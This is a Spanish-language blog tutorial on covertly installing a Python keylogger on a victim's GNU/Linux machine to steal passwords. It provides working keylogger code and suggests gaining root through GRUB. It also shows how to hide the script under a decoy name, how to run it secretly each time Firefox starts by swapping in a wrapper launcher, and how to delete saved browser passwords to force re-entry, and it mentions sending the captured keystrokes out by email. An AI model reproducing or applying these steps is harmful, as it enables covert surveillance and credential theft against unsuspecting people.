Author: Jorge Maldonado Ventura
Category: Python
Date: 2023-02-01 14:00
Lang: es
Slug: registrador-de-teclas-i-langenkeyloggeri-básico-para-gnulinux
Tags: registrador de teclas, hack, keylogger, macOS, Python, seguridad, Windows
Title: Registrador de teclas (<i lang="en">keylogger</i>) básico para GNU/Linux. Robar contraseñas e información tecleada
Image: <img src="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png" alt="" width="1200" height="675" srcset="/wp-content/uploads/2023/02/registrador-de-teclas-con-Python.png 1200w, /wp-content/uploads/2023/02/registrador-de-teclas-con-Python-600x337.png 600w" sizes="(max-width: 1200px) 100vw, 1200px">

Una forma sencilla de robar contraseñas es instalar un registrador de
teclas (<i lang="en">keylogger</i>) en el ordenador de la víctima. Voy
a mostrar cómo hacerlo en GNU/Linux usando el lenguaje de programación
Python.

Lo primero que debemos hacer es obtener permisos de superusuario. Si el
equipo lo administramos nosotros, ya sabemos la contraseña. En caso
contrario, podemos
[obtener acceso como superusuario desde
GRUB](https://byte-mind.net/obtener-acceso-root-desde-grub-linux/). Con
los permisos necesarios tenemos vía libre para instalar el
<i lang="en">keylogger</i>.

En primer lugar, hay que instalar el módulo `pynput` mediante...

    :::bash
    sudo pip install pynput

A continuación, debemos escribir el <i lang="en">keylogger</i>. Este
es el código que usaremos:

    :::python
    #!/usr/bin/env python3
    from pynput.keyboard import Key, Listener
    import logging

    log_dir = "/usr/share/doc/python3/"

    logging.basicConfig(filename=(log_dir + "log"), \
            level=logging.DEBUG, format='%(asctime)s: %(message)s')

    def on_press(key):
        logging.info(str(key))

    with Listener(on_press=on_press) as listener:
        listener.join()

El registro de teclas se guarda en `log_dir`. Yo, en este caso, he
especificado la carpeta de documentación de Python 3 en GNU/Linux.
El <i lang="en">keylogger</i> también podemos guardarlo en ese mismo
directorio, quizá con el nombre <code>compile_docs.py</code> o algo
parecido para no llamar la atención. Lo ideal es elegir una carpeta a la
que la victima no vaya a entrar para evitar que se dé cuenta de lo que
estamos haciendo.

El último paso sería ejecutar el programa cada vez que se encienda el
ordenador o se inicie un programa <span id="paso2">sin que la víctima se
dé cuenta</span>. Si, por ejemplo, queremos iniciar el <i
lang="en">keylogger</i> cada vez que el usuario abra Firefox, podemos
modificar el comando Firefox. <!-- more -->Podemos renombrar `firefox`[^1] a
`firefox.bin` y crear el siguiente archivo llamado `firefox`.

    :::bash
    python3 /usr/share/doc/python3/compile_docs.py &
    exec firefox.bin "@$"

Para saber qué archivo `firefox` se ejecuta cuando pulsamos su icono debemos ir a
`/usr/share/applications`, entrar al archivo `firefox.desktop` (o
`firefox-esr.desktop`) y buscar la línea que empieza por `Exec`.

A continuación, habría que darle permisos de escritura para otros
usuarios distintos de `root` al directorio donde vamos a almacenar el
registro de tecleo:

    :::bash
    sudo chmod o+w /usr/share/doc/python3

Finalmente, deberíamos esperar a que la víctima usara el ordenador para
obtener sus contraseñas o cualquier información que teclee que queramos
obtener. El registro de teclas se guardará en el archivo
`/usr/share/doc/python3/log`. Pero ten cuidado: el archivo puede ocupar
mucho espacio si no lo borras periódicamente, por lo que lo mejor sería
desinstalar el <i lang="en">keylogger</i> después de obtener la
información que necesitemos. Otra opción es configurarlo para [que mande
la información de tecleo por correo electrónico en vez de guardarla en
un archivo](/registrador-de-teclas-keylogger-avanzado-en-python-para-gnu-linux/), con lo que no ocuparía mucho espacio el ordenador de la
víctima; pero ese método requiere que usemos un correo electrónico[^2].

Si la víctima tiene las contraseñas guardadas en el navegador y no
necesita escribirlas de nuevo, podemos borrarle el archivo de
contraseñas para que se vea obligada a introducirlas de nuevo. En
definitiva, con ingenio podemos conseguir mucha información,
especialmente si aplicamos este método contra usuarios poco avanzados,
que no sospecharán mucho. Para usuarios más avanzados quizá lo mejor
sería compilar el programa `compile_docs.py` con [Nuitka](https://nuitka.net/), como muestro [en el siguiente artículo](/registrador-de-teclas-keylogger-avanzado-en-python-para-gnu-linux/).

[^1]: En Debian tendríamos que modificar el archivo `firefox-esr`.
[^2]: La ventaja de enviar las contraseñas por correo electrónico es que
 no necesitamos volver al ordenador de la víctima para abrir el
 archivo de registro de tecleo, sino que recibiremos la información
 periódicamente por correo.
